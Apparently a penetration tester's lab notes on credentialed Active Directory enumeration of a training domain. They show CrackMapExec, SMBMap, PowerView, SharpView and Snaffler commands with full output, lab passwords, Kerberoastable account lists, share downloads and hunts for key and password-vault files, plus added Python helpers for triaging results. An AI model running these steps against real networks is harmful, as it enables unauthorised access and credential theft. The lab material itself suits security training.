Credentialed Enumeration
Credentialed Enumeration - from Linux
CrackMapExec (CME)
Domain User Enumeration
C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] Enumerated domain user(s)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\administrator badpwdcount: 0 baddpwdtime: 2022-03-29 12:29:14.476567
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\guest badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\lab_adm badpwdcount: 0 baddpwdtime: 2022-04-09 23:04:58.611828
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\krbtgt badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\htb-student badpwdcount: 0 baddpwdtime: 2022-03-30 16:27:41.960920
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\avazquez badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.903395
Domain Group Enumeration
C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] Enumerated domain group(s)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Administrators membercount: 3
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Users membercount: 4
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Guests membercount: 2
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Print Operators membercount: 0
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Backup Operators membercount: 1
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Replicator membercount: 0
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Domain Admins membercount: 19
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Domain Users membercount: 0
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Contractors membercount: 138
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Accounting membercount: 15
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Engineering membercount: 19
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Executives membercount: 10
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Human Resources membercount: 36
Logged-On Users
C:\mrci0x1> sudo crackmapexec smb 172.16.5.130 -u forend -p Klmcargo2 --loggedon-users
SMB 172.16.5.130 445 ACADEMY-EA-FILE [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-FILE) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 172.16.5.130 445 ACADEMY-EA-FILE [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 (Pwn3d!)
SMB 172.16.5.130 445 ACADEMY-EA-FILE [+] Enumerated loggedon users
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\clusteragent logon_server: ACADEMY-EA-DC01
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\lab_adm logon_server: ACADEMY-EA-DC01
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\svc_qualys logon_server: ACADEMY-EA-DC01
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\wley logon_server: ACADEMY-EA-DC01
Share Enumeration
C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] Enumerated shares
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Share Permissions Remark
SMB 172.16.5.5 445 ACADEMY-EA-DC01 ----- ----------- ------
SMB 172.16.5.5 445 ACADEMY-EA-DC01 ADMIN$ Remote Admin
SMB 172.16.5.5 445 ACADEMY-EA-DC01 C$ Default share
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Department Shares READ
SMB 172.16.5.5 445 ACADEMY-EA-DC01 IPC$ READ Remote IPC
SMB 172.16.5.5 445 ACADEMY-EA-DC01 NETLOGON READ Logon server share
SMB 172.16.5.5 445 ACADEMY-EA-DC01 SYSVOL READ Logon server share
SMB 172.16.5.5 445 ACADEMY-EA-DC01 User Shares READ
SMB 172.16.5.5 445 ACADEMY-EA-DC01 ZZZ_archive READ
Spidering Shares
C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2
SPIDER_P... 172.16.5.5 445 ACADEMY-EA-DC01 [*] Started spidering plus with option:
SPIDER_P... 172.16.5.5 445 ACADEMY-EA-DC01 [*] DIR: ['print$']
SPIDER_P... 172.16.5.5 445 ACADEMY-EA-DC01 [*] EXT: ['ico', 'lnk']
SPIDER_P... 172.16.5.5 445 ACADEMY-EA-DC01 [*] SIZE: 51200
SPIDER_P... 172.16.5.5 445 ACADEMY-EA-DC01 [*] OUTPUT: /tmp/cme_spider_plus
C:\mrci0x1> head -n 10 /tmp/cme_spider_plus/172.16.5.5.json
{
"Department Shares": {
"Accounting/Private/AddSelect.bat": {
"atime_epoch": "2022-03-31 14:44:42",
"ctime_epoch": "2022-03-31 14:44:39",
"mtime_epoch": "2022-03-31 15:14:46",
"size": "278 Bytes"
},
"Accounting/Private/ApproveConnect.wmf": {
"atime_epoch": "2022-03-31 14:45:14"
}
}
}
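The spider_plus module writes one JSON file per host in the shape shown above. The following added example (not part of the original notes or of CME) walks such a listing and pulls out the files a defender would not want readable by every domain user; the sample listing and the extension list are constructed for the demo.

```python
"""Triage a CrackMapExec spider_plus listing (/tmp/cme_spider_plus/<ip>.json).

Added example, not part of the original notes or of CME itself. The sample
listing below is constructed to match the JSON shape shown above; the
extension list is an assumption (it mirrors file types Snaffler flags later)."""
import json
import re

# Constructed sample in the same shape as 172.16.5.5.json above.
SAMPLE_LISTING = json.dumps({
    "Department Shares": {
        "Accounting/Private/AddSelect.bat": {
            "atime_epoch": "2022-03-31 14:44:42",
            "ctime_epoch": "2022-03-31 14:44:39",
            "mtime_epoch": "2022-03-31 15:14:46",
            "size": "278 Bytes",
        },
        "Accounting/Private/ApproveConnect.wmf": {
            "atime_epoch": "2022-03-31 14:45:14",
            "size": "1.2 KB",
        },
        "IT/Infosec/GroupBackup.kdb": {"size": "289 Bytes"},
        "IT/Development/DenyRedo.sqldump": {"size": "3.1 MB"},
    },
    "User Shares": {"wley/notes.txt": {"size": "12 Bytes"}},
})

# Extensions that commonly carry secrets (assumed list; extend per environment).
SENSITIVE_EXT = {"kdb", "kdbx", "key", "kwallet", "ppk", "sqldump", "mdf",
                 "bat", "ps1", "vbs", "config", "pem", "pfx"}

_UNITS = {"bytes": 1, "b": 1, "kb": 1024, "mb": 1024 ** 2, "gb": 1024 ** 3}


def parse_size(text):
    """Turn spider_plus size strings such as '278 Bytes' or '1.2 KB' into bytes."""
    m = re.fullmatch(r"\s*([\d.]+)\s*([A-Za-z]+)\s*", text or "")
    if not m or m.group(2).lower() not in _UNITS:
        return None
    return int(float(m.group(1)) * _UNITS[m.group(2).lower()])


def triage(listing_json, sensitive_ext=SENSITIVE_EXT):
    """Return [(share, path, size_bytes)] for every file whose extension is in
    sensitive_ext, largest first, so review starts with the biggest dumps."""
    data = json.loads(listing_json)
    hits = []
    for share, files in data.items():
        for path, meta in files.items():
            ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
            if ext in sensitive_ext:
                hits.append((share, path, parse_size(meta.get("size"))))
    hits.sort(key=lambda h: (-(h[2] or 0), h[0], h[1]))
    return hits


if __name__ == "__main__":
    for share, path, size in triage(SAMPLE_LISTING):
        print(f"{share}\\{path}  ({size} bytes)")
```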
SMBMap
Share Enumeration
C:\mrci0x1> smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5
[+] IP: 172.16.5.5:445 Name: inlanefreight.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
User Shares READ ONLY
ZZZ_archive READ ONLY
Recursive Directory Listing
C:\mrci0x1> smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' --dir-only
[+] IP: 172.16.5.5:445 Name: inlanefreight.local
Disk Permissions Comment
---- ----------- -------
Department Shares READ ONLY
.\Department Shares\*
dr--r--r-- 0 Thu Mar 31 15:34:29 2022 .
dr--r--r-- 0 Thu Mar 31 15:34:29 2022 ..
dr--r--r-- 0 Thu Mar 31 15:14:48 2022 Accounting
dr--r--r-- 0 Thu Mar 31 15:14:39 2022 Executives
dr--r--r-- 0 Thu Mar 31 15:14:57 2022 Finance
dr--r--r-- 0 Thu Mar 31 15:15:04 2022 HR
dr--r--r-- 0 Thu Mar 31 15:15:21 2022 IT
dr--r--r-- 0 Thu Mar 31 15:15:14 2022 Marketing
dr--r--r-- 0 Thu Mar 31 15:15:30 2022 Sales
Downloading File from Share
C:\mrci0x1> smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' -r 'Accounting/Private/AddSelect.bat' -A
[+] Downloading AddSelect.bat
[+] File saved to: ./AddSelect.bat
CrackMapExec Credentials Validation
C:\mrci0x1> crackmapexec smb 172.16.5.5 -u administrator -p "P@ssw0rd123"
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] ACADEMY-EA-DC01\administrator:P@ssw0rd123
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
Credentialed Enumeration - from Windows
ActiveDirectory PowerShell Module
Check Available Modules
PS C:\mrci0x1> Get-Module
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
Script 2.0.0 PSReadline {Get-PSReadLineKeyHandler, Get-PSReadLineOption, Remove-PS...
Import Module
PS C:\mrci0x1> Import-Module ActiveDirectory
PS C:\mrci0x1> Get-Module
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 1.0.1.0 ActiveDirectory {Add-ADCentralAccessPolicyMember, Add-ADComputerServiceAcc...
Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
Script 2.0.0 PSReadline {Get-PSReadLineKeyHandler, Get-PSReadLineOption, Remove-PS...
Domain Information
PS C:\mrci0x1> Get-ADDomain
AllowedDNSSuffixes : {}
ChildDomains : {LOGISTICS.INLANEFREIGHT.LOCAL}
ComputersContainer : CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
DeletedObjectsContainer : CN=Deleted Objects,DC=INLANEFREIGHT,DC=LOCAL
DistinguishedName : DC=INLANEFREIGHT,DC=LOCAL
DNSRoot : INLANEFREIGHT.LOCAL
DomainControllersContainer : OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
DomainMode : Windows2016Domain
DomainSID : S-1-5-21-3842939050-3880317879-2865463114
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=INLANEFREIGHT,DC=LOCAL
Forest : INLANEFREIGHT.LOCAL
InfrastructureMaster : ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
LastLogonReplicationInterval :
LinkedGroupPolicyObjects : {cn={DDBB8574-E94E-4525-8C9D-ABABE31223D0},cn=policies,cn=system,DC=INLANEFREIGHT,
DC=LOCAL, CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=INLA
User Enumeration (Kerberoastable Accounts)
PS C:\mrci0x1> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
DistinguishedName : CN=adfs,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
Enabled : True
GivenName : Sharepoint
Name : adfs
ObjectClass : user
ObjectGUID : 49b53bea-4bc4-4a68-b694-b806d9809e95
SamAccountName : adfs
ServicePrincipalName : {adfsconnect/azure01.inlanefreight.local}
SID : S-1-5-21-3842939050-3880317879-2865463114-5244
Surname : Admin
UserPrincipalName :
DistinguishedName : CN=BACKUPAGENT,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
Enabled : True
GivenName : Jessica
Name : BACKUPAGENT
ObjectClass : user
ObjectGUID : 2ec53e98-3a64-4706-be23-1d824ff61bed
SamAccountName : backupagent
ServicePrincipalName : {backupjob/veam001.inlanefreight.local}
SID : S-1-5-21-3842939050-3880317879-2865463114-5220
Surname : Systemmailbox 8Cc370d3-822A-4Ab8-A926-Bb94bd0641a9
Trust Relationships
PS C:\mrci0x1> Get-ADTrust -Filter *
Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=LOGISTICS.INLANEFREIGHT.LOCAL,CN=System,DC=INLANEFREIGHT,DC=LOCAL
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : LOGISTICS.INLANEFREIGHT.LOCAL
ObjectClass : trustedDomain
ObjectGUID : f48a1169-2e58-42c1-ba32-a6ccb10057ec
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=INLANEFREIGHT,DC=LOCAL
Target : LOGISTICS.INLANEFREIGHT.LOCAL
TGTDelegation : False
TrustAttributes : 32
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False
Group Enumeration
PS C:\mrci0x1> Get-ADGroup -Filter * | select name
name
----
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
Detailed Group Info
PS C:\mrci0x1> Get-ADGroup -Identity "Backup Operators"
DistinguishedName : CN=Backup Operators,CN=Builtin,DC=INLANEFREIGHT,DC=LOCAL
GroupCategory : Security
GroupScope : DomainLocal
Name : Backup Operators
ObjectClass : group
ObjectGUID : 6276d85d-9c39-4b7c-8449-cad37a8abc38
SamAccountName : Backup Operators
SID : S-1-5-32-551
Group Membership
PS C:\mrci0x1> Get-ADGroupMember -Identity "Backup Operators"
distinguishedName : CN=BACKUPAGENT,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
name : BACKUPAGENT
objectClass : user
objectGUID : 2ec53e98-3a64-4706-be23-1d824ff61bed
SamAccountName : backupagent
SID : S-1-5-21-3842939050-3880317879-2865463114-5220
PowerView
User Information
PS C:\mrci0x1> Get-DomainUser -Identity mmorgan -Domain inlanefreight.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol
name : Matthew Morgan
samaccountname : mmorgan
description :
memberof : {CN=VPN Users,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=Shared Calendar
Read,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=Printer Access,OU=Security
Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=File Share H Drive,OU=Security
Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL...}
whencreated : 10/27/2021 5:37:06 PM
pwdlastset : 11/18/2021 10:02:57 AM
lastlogontimestamp : 2/27/2022 6:34:25 PM
accountexpires : NEVER
admincount : 1
userprincipalname : mmorgan@inlanefreight.local
serviceprincipalname :
mail :
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
Group Membership
PS C:\mrci0x1> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
GroupDomain : INLANEFREIGHT.LOCAL
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain : INLANEFREIGHT.LOCAL
MemberName : svc_qualys
MemberDistinguishedName : CN=svc_qualys,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass : user
MemberSID : S-1-5-21-3842939050-3880317879-2865463114-5613
GroupDomain : INLANEFREIGHT.LOCAL
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain : INLANEFREIGHT.LOCAL
MemberName : sp-admin
MemberDistinguishedName : CN=Sharepoint Admin,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass : user
MemberSID : S-1-5-21-3842939050-3880317879-2865463114-5228
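The CrackMapExec `--loggedon-users` run earlier showed svc_qualys with a session on ACADEMY-EA-FILE, and the recursive Domain Admins listing above shows the same account is a DA. The following added example (not CME or PowerView code) cross-references the two outputs to list privileged sessions on hosts that are not domain controllers; the log lines and the MS01 entry are constructed copies of the page's format.

```python
"""Find Domain Admin sessions on non-DC hosts by joining CME --loggedon-users
output with Domain Admins membership.

Added example, not part of the original notes or of CME/PowerView. The lines
below are constructed in the same format as the ACADEMY-EA-FILE run above;
the ACADEMY-EA-MS01 line (and its IP) is invented for the demo."""
import re

# Constructed CME --loggedon-users output (status lines included on purpose).
CME_LOGGEDON = """\
SMB 172.16.5.130 445 ACADEMY-EA-FILE [+] Enumerated loggedon users
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\\clusteragent logon_server: ACADEMY-EA-DC01
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\\lab_adm logon_server: ACADEMY-EA-DC01
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\\svc_qualys logon_server: ACADEMY-EA-DC01
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\\wley logon_server: ACADEMY-EA-DC01
SMB 172.16.5.125 445 ACADEMY-EA-MS01 INLANEFREIGHT\\svc_qualys logon_server: ACADEMY-EA-DC01
"""

# MemberName values from the Get-DomainGroupMember "Domain Admins" -Recurse output above.
DOMAIN_ADMINS = {"svc_qualys", "sp-admin"}

# One session line: SMB <ip> <port> <host> <DOMAIN>\<user> logon_server: <dc>
LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+\d+\s+(?P<host>\S+)\s+"
    r"(?P<domain>[^\\\s]+)\\(?P<user>\S+)\s+logon_server:\s*(?P<dc>\S+)\s*$")


def parse_loggedon(text):
    """Yield (host, ip, domain, user, logon_server) per session line;
    [+]/[*] status lines do not match the pattern and are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield (m["host"], m["ip"], m["domain"], m["user"], m["dc"])


def exposed_admin_sessions(text, admins, domain_controllers=()):
    """Map each privileged account to the hosts where it has a session,
    ignoring domain controllers (a DA session on a DC is expected)."""
    admins_ci = {a.lower() for a in admins}
    dcs = {d.upper() for d in domain_controllers}
    exposure = {}
    for host, _ip, _dom, user, _dc in parse_loggedon(text):
        if user.lower() in admins_ci and host.upper() not in dcs:
            exposure.setdefault(user.lower(), set()).add(host)
    return exposure


if __name__ == "__main__":
    found = exposed_admin_sessions(CME_LOGGEDON, DOMAIN_ADMINS, ["ACADEMY-EA-DC01"])
    for user, hosts in sorted(found.items()):
        print(f"{user}: session on {', '.join(sorted(hosts))}")
```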
Trust Enumeration
PS C:\mrci0x1> Get-DomainTrustMapping
SourceName : INLANEFREIGHT.LOCAL
TargetName : LOGISTICS.INLANEFREIGHT.LOCAL
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/1/2021 6:20:22 PM
WhenChanged : 2/26/2022 11:55:55 PM
SourceName : INLANEFREIGHT.LOCAL
TargetName : FREIGHTLOGISTICS.LOCAL
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
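Get-ADTrust printed the child-domain trust's TrustAttributes as the bare integer 32, while PowerView shows the same attribute as WITHIN_FOREST; likewise PowerView rendered mmorgan's useraccountcontrol as NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH. The added example below (not from the original notes) decodes both bitmasks and goes slightly beyond the page by handling any combination of flags, with the documented MS-ADTS constants as the tables.

```python
"""Decode userAccountControl and trustAttributes bitmasks as seen on this page.

Added example, not part of the original notes. The flag tables are the
documented MS-ADTS / MS-SAMR constants; UAC_RISKY is an assumed review policy."""

UAC_FLAGS = {
    0x0001: "SCRIPT", 0x0002: "ACCOUNTDISABLE", 0x0008: "HOMEDIR_REQUIRED",
    0x0010: "LOCKOUT", 0x0020: "PASSWD_NOTREQD", 0x0040: "PASSWD_CANT_CHANGE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED", 0x0100: "TEMP_DUPLICATE_ACCOUNT",
    0x0200: "NORMAL_ACCOUNT", 0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT", 0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD", 0x20000: "MNS_LOGON_ACCOUNT",
    0x40000: "SMARTCARD_REQUIRED", 0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED", 0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH", 0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION", 0x4000000: "PARTIAL_SECRETS_ACCOUNT",
}

TRUST_ATTRIBUTES = {
    0x001: "NON_TRANSITIVE", 0x002: "UPLEVEL_ONLY", 0x004: "QUARANTINED_DOMAIN",
    0x008: "FOREST_TRANSITIVE", 0x010: "CROSS_ORGANIZATION", 0x020: "WITHIN_FOREST",
    0x040: "TREAT_AS_EXTERNAL", 0x080: "USES_RC4_ENCRYPTION",
    0x200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION", 0x400: "PIM_TRUST",
}

# UAC flags a defender should review on any account carrying them (assumed policy).
UAC_RISKY = {"DONT_REQ_PREAUTH", "PASSWD_NOTREQD", "TRUSTED_FOR_DELEGATION",
             "TRUSTED_TO_AUTH_FOR_DELEGATION", "USE_DES_KEY_ONLY", "DONT_EXPIRE_PASSWORD"}


def decode_flags(value, table):
    """Return the names of all set bits in value, lowest bit first; unknown bits as hex."""
    names = []
    for bit in range(value.bit_length()):
        mask = 1 << bit
        if value & mask:
            names.append(table.get(mask, f"UNKNOWN_0x{mask:X}"))
    return names


def encode_flags(names, table):
    """Inverse of decode_flags: turn a PowerView flag string back into the integer."""
    inverse = {v: k for k, v in table.items()}
    return sum(inverse[n.strip()] for n in names)


def review_uac(value):
    """Split an account's UAC into (all flags, flags worth a second look)."""
    flags = decode_flags(value, UAC_FLAGS)
    return flags, [f for f in flags if f in UAC_RISKY]


if __name__ == "__main__":
    mmorgan = encode_flags(["NORMAL_ACCOUNT", "DONT_EXPIRE_PASSWORD", "DONT_REQ_PREAUTH"], UAC_FLAGS)
    print(mmorgan, review_uac(mmorgan))        # 4260352 and its risky subset
    print(decode_flags(32, TRUST_ATTRIBUTES))  # Get-ADTrust's 32 -> ['WITHIN_FOREST']
    print(decode_flags(8, TRUST_ATTRIBUTES))   # ['FOREST_TRANSITIVE']
```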
Local Admin Access
PS C:\mrci0x1> Test-AdminAccess -ComputerName ACADEMY-EA-MS01
ComputerName IsAdmin
------------ -------
ACADEMY-EA-MS01 True
Kerberoastable Accounts
PS C:\mrci0x1> Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName
serviceprincipalname samaccountname
-------------------- --------------
adfsconnect/azure01.inlanefreight.local : adfs
backupjob/veam001.inlanefreight.local : backupagent
d0wngrade/kerberoast.inlanefreight.local : d0wngrade
kadmin/changepw : krbtgt
MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433 : sqldev
MSSQLSvc/SPSJDB.inlanefreight.local:1433 : sqlprod
MSSQLSvc/SQL-CL01-01inlanefreight.local:49351 : sqlqa
sts/inlanefreight.local : solarwindsmonitor
testspn/kerberoast.inlanefreight.local : testspn
testspn2/kerberoast.inlanefreight.local : testspn2
SharpView
User Enumeration
PS C:\mrci0x1> .\SharpView.exe Get-DomainUser -Identity forend
[Get-DomainSearcher] search base: LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
[Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=forend)))
objectsid : {S-1-5-21-3842939050-3880317879-2865463114-5614}
samaccounttype : USER_OBJECT
objectguid : 53264142-47ab
useraccountcontrol : OBJECT_4
accountexpires : 12/31/1600 4:00:00 PM
lastlogon : 4/18/2022 1:01:21 PM
lastlogontimestamp : 4/9/2022 1:33:21 PM
pwdlastset : 2/28/2022 12:31:45 PM
lastlogoff : 12/31/1600 4:00:00 PM
badpasswordtime : 4/5/2022 7:09:07 AM
name : forend user
distinguishedname : CN=forend,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
whencreated : 2/28/2022 8:03:45 PM
whenchanged : 4/9/2022 8:33:21 PM
samaccountname : forend
memberof : {CN=VPN Users,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=Shared Calendar Read,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=Purchase Access,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=File Share Drive,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL}
cn : {forend}
Snaffler
Execution Command
PS C:\mrci0x1> .\Snaffler.exe -d INLANEFREIGHT -s -v data
by l0ss and Sh3r4 - - - github.com/SnaffCon/Snaffler
2022-03-31 12:16:54 -07:00 [Share] {Black}(\\ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL\ADMIN$)
2022-03-31 12:16:54 -07:00 [Share] {Black}(\\ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL\C$)
2022-03-31 12:16:54 -07:00 [Share] {Green}(\\ACADEMY-EA-MX01.INLANEFREIGHT.LOCAL\address)
2022-03-31 12:16:54 -07:00 [Share] {Green}(\\ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL\Department Shares)
2022-03-31 12:16:54 -07:00 [Share] {Green}(\\ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL\User Shares)
2022-03-31 12:16:54 -07:00 [Share] {Green}(\\ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL\ZZZ_archive)
2022-03-31 12:17:18 -07:00 [Share] {Green}(\\ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL\CertEnroll)
2022-03-31 12:17:19 -07:00 [File] {Black}<KeepExtExactBlack|R|^\.kdb$|289B|3/31/2022 12:09:22 PM>(\\ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL\Department Shares\IT\Infosec\GroupBackup.kdb) .kdb
2022-03-31 12:17:19 -07:00 [File] {Red}<KeepExtExactRed|R|^\.key$|299B|3/31/2022 12:05:33 PM>(\\ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL\Department Shares\IT\Infosec\ShowReset.key) .key
2022-03-31 12:17:19 -07:00 [Share] {Green}(\\ACADEMY-EA-FILE.INLANEFREIGHT.LOCAL\UpdateServicesPackages)
2022-03-31 12:17:31 -07:00 [File] {Black}<KeepExtExactBlack|R|^\.kwallet$|302B|3/31/2022 12:04:32 PM>(\\ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL\Department Shares\IT\Infosec\WriteUse.kwallet) .kwallet
2022-03-31 12:17:31 -07:00 [File] {Red}<KeepExtExactRed|R|^\.key$|298B|3/31/2022 12:05:31 PM>(\\ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL\Department Shares\IT\Infosec\ProtectStep.key) .key
2022-03-31 12:17:31 -07:00 [File] {Black}<KeepExtExactBlack|R|^\.ppk$|275B|3/31/2022 12:04:40 PM>(\\ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL\Department Shares\IT\Infosec\StopTrace.ppk) .ppk
